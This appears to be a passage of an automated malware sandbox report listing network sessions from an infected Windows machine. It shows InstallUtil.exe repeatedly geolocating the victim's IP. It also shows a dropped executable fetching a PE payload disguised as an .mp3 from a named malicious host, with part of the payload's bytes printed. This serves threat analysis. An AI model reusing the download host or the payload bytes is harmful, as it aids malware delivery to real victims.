                        2024-09-26 07:58:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:18 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.549730188.114.96.34435500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:19 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:19 UTC683INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:19 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2331
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdE5PCJZQs%2FznskTYzIoE5%2Fq94XSALFXJTqJu3bsZn%2F6mThoja9dvdN2snlNP2nzxGhoS%2FUT%2BPVkKAM%2BnNC0tT2ZW5JXPLAbf8l9MOiO17ivwmfxUokehYLGnvtJToCHqEMMK%2FrT"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b54c8dd35e73-EWR
                        2024-09-26 07:58:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:19 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.549731188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:19 UTC685INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:19 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2331
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0YJWDI7SSOEMht%2F%2BnS4rr%2FuHqhGJyop67ebxB2j70qjGszpi5X%2FcoKmd6BmzoHxk8pv%2B8QNg99MmaFaaQtzs%2F2yIIraWdOgF051fqQqNUZpY04G4TpFUeTNI7%2BBuQe%2BnxUgXZ9yr"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b54e7a83420d-EWR
                        2024-09-26 07:58:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:19 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.54973267.212.175.1624436716C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:20 UTC86OUTGET /panel/Skdqhzzwa.mp3 HTTP/1.1
                        Host: wymascensores.com
                        Connection: Keep-Alive
                        2024-09-26 07:58:20 UTC210INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:19 GMT
                        Server: Apache
                        Last-Modified: Wed, 25 Sep 2024 23:10:38 GMT
                        Accept-Ranges: bytes
                        Content-Length: 1841152
                        Connection: close
                        Content-Type: audio/mpeg
                        2024-09-26 07:58:20 UTC7982INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                        Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                        2024-09-26 07:58:20 UTC8000INData Raw: 36 33 32 30 34 46 43 37 46 34 37 37 36 31 37 45 37 46 30 32 30 30 30 34 37 42 36 39 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 31 30 30 30 30 32 42 38 30 34 41 30 30 30 30 30 34 32 30 31 38 30 30 30 30 30 30 33 38 31 34 46 39 46 46 46 46 32 30 45 46 31 31 43 34 38 36 32 30 42 36 43 37 37 36 34 46 36 31 32 30 43 32 35 31 31 34 39 39 36 31 37 45 37 46 30 32 30 30 30 34 37 42 35 34 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 30 32 43 38 42 45 36 36 45 32 30 39 35 33 31 45 30 33 30 36 31 37 45 37 46 30 32 30 30 30 34 37 42 34 42 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 34 34 30 30 30 30 30
                        Data Ascii: 63204FC7F477617E7F0200047B69020004617EBE020004283F090006281100002B804A00000420180000003814F9FFFF20EF11C48620B6C7764F6120C2511499617E7F0200047B54020004617EBE020004283F090006202C8BE66E209531E030617E7F0200047B4B020004617EBE020004283F090006281200002B804400000
                        2024-09-26 07:58:20 UTC8000INData Raw: 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 36 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 30 30 33 30 30 30 36 32 30 30 32 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33
                        Data Ascii: 0004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000162A0000001330030004000000000000000000002A1330030004000000000000000000002A13300300800000000100001128800300062002000000FE0E00003
                        2024-09-26 07:58:20 UTC8000INData Raw: 30 30 34 37 30 30 30 30 30 30 33 30 30 32 30 30 30 30 37 37 30 32 30 30 30 30 33 41 30 30 30 30 30 30 31 42 30 30 30 30 30 31 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 30 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 35 30 30 30 30 30 30 32 45 30 30 30 30 30 30 33 38 32 41 30 30 30 30 30 30 37 45 39 39 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 39 33 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 41 30 32 30 30 30 34 32 38 41 46 30
                        Data Ascii: 004700000030020000770200003A0000001B00000113300300800000000100001128800300062001000000FE0E00003800000000FE0C000045030000002F000000050000002E000000382A0000007E9902000428AB08000620000000007E7F0200047B930200043ACCFFFFFF26200000000038C1FFFFFF2A7E9A02000428AF0
                        2024-09-26 07:58:20 UTC8000INData Raw: 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 39 36 30 32 30 30 30 34 33 39 43 43 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 39 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 37 37 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30
                        Data Ascii: 02000428AF08000620020000007E7F0200047B9602000439CCFFFFFF26200100000038C1FFFFFF2A7E9902000428AB08000620000000007E7F0200047B770200043AA2FFFFFF2620000000003897FFFFFF120000002A000000120000142A000000120000002A000000120000002A000000120000002A000000120000002A000
                        2024-09-26 07:58:20 UTC8000INData Raw: 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 43 46 30 30 30 30 30 30 39 32 30 30 30 30 30 30 36 31 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 39 33 30 30 30 30 30 30 35 39 30 31 30 30 30 30 45 43 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30
                        Data Ascii: 2A1330050004000000000000000000002A0330080004000000000000000000142A4134000002000000CF00000092000000610100008B00000000000000020000009300000059010000EC0100008B000000000000001330040004000000000000000000142A1330050004000000000000000000142A033008000400000000000
                        2024-09-26 07:58:20 UTC8000INData Raw: 30 36 31 45 31 43 31 46 33 39 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 46 31 46 30 41 31 46 33 41 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30
                        Data Ascii: 061E1C1F3906286B030006120609110411051F0F1F0A1F3A06286B030006120511060911041C1F0F1F3B06286B030006120411051106091F0D1F151F3C06286B03000612031104110511061A1C1F3D06286B030006120609110411051F0B1F0A1F3E06286B03000612051106091104181F0F1F3F06286B03000612041105110
                        2024-09-26 07:58:20 UTC8000INData Raw: 31 31 30 30 30 30 30 30 33 38 41 36 46 37 46 46 46 46 30 30 37 45 36 41 30 31 30 30 30 34 37 32 46 35 30 31 30 30 37 30 32 38 42 35 30 33 30 30 30 36 37 33 35 36 30 34 30 30 30 36 32 35 32 38 42 36 30 33 30 30 30 36 31 36 36 41 32 38 42 37 30 33 30 30 30 36 32 35 32 35 32 38 42 36 30 33 30 30 30 36 32 38 42 38 30 33 30 30 30 36 36 39 32 38 42 39 30 33 30 30 30 36 31 33 31 46 32 30 32 30 30 30 30 30 30 30 38 44 31 44 30 30 30 30 30 31 46 45 30 45 31 34 30 30 32 30 30 31 30 30 30 30 30 30 32 30 34 32 30 30 30 30 30 30 35 38 46 45 30 45 32 38 30 30 46 45 30 43 31 34 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 32 38 30 30 39 43 46 45 30 43 31 34 30 30 32 30 30 30 30 30 30 30 30 30 32 30 46 34 30 30 30 30 30 30 32 30 35 31 30 30 30 30 30 30 35 39 39 43 32
                        Data Ascii: 1100000038A6F7FFFF007E6A01000472F501007028B503000673560400062528B6030006166A28B7030006252528B603000628B80300066928B9030006131F20200000008D1D000001FE0E14002001000000204200000058FE0E2800FE0C14002000000000FE0C28009CFE0C1400200000000020F40000002051000000599C2
                        2024-09-26 07:58:20 UTC8000INData Raw: 30 30 46 45 30 43 31 31 30 30 32 30 30 32 30 30 30 30 30 30 46 45 30 43 31 35 30 30 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 35 36 30 30 30 30 30 30 32 30 35 46 30 30 30 30 30 30 35 38 39 43 32 30 39 39 30 30 30 30 30 30 32 30 33 33 30 30 30 30 30 30 35 39 46 45 30 45 31 35 30 30 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 46 45 30 43 31 35 30 30 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 38 36 30 30 30 30 30 30 32 30 32 43 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 43 42 30 30 30 30 30 30 32 30 34 33 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 38 37 30 30 30 30 30 30 32 30 34 39 30 30 30 30 30 30 35 38 39
                        Data Ascii: 00FE0C11002002000000FE0C15009CFE0C110020030000002056000000205F000000589C2099000000203300000059FE0E1500FE0C11002003000000FE0C15009CFE0C110020030000002086000000202C000000599CFE0C1100200300000020CB0000002043000000599CFE0C1100200300000020870000002049000000589
                        2024-09-26 07:58:20 UTC8000INData Raw: 30 30 33 38 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 33 30 36 30 30 30 30 35 33 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 36 32 41 30 30 30 30 31 33 33 30 30 34 30 30 33 34 30 30 30 30 30 30 34 44 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 30 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 34 45 30 30 30 30 31 31 37 45 36 31 30 31 30 30 30 34 38 45 33 41 32 39 30 30 30 30 30
                        Data Ascii: 0038060000060000001B00000100000000000000005306000053060000060000001B000001062A000013300400340000004D00001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B0040006262A1B300600BE0100004E0000117E610100048E3A2900000


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.549735188.114.96.34435500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:20 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:21 UTC687INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:21 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2333
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PHu48KBjKtXBhStibEa%2FjSVF5%2FBCfKDYsyVTlAQ0hn05c5E3avxiEHsGsfCcvN3c%2Fab%2B1C%2FYryqbRB77JVARU5kT9HGPQRamo3kQPEEdVnQuOrzi%2FkZWiKLzJ5urdPQfqrY%2Fnb%2F%2F"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5558f084388-EWR
                        2024-09-26 07:58:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:21 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.549736188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:21 UTC675INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:21 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2333
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9noQzGBZJHuSpD6ycorPiIkN3PK4iVaP21e9ySN4pNX1y92BchQyYSJHgRw9y8cVwsWlC%2BAxVlwyXpB%2FN1HHPHQaLNxm2kt4WsWgY5unw6CkF%2BGZWAeF71fyVSX5RDzNR5xvWqib"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5569ee30fa8-EWR
                        2024-09-26 07:58:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:21 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.549739188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:24 UTC673INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:24 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2336
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3a26l4iFVg15spp8Hpt%2F6kN9wA19Ixw6tVSBnj5fNUKNSgEQDnEuxxEGTe46wsam7T4hr3nQXzrWgFWBl4QlUOOBrAuRQiHAj2z%2B5s37S0MSyQETkWgqWPRzhoY2doF2cNJoHHiS"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5682e9243ed-EWR
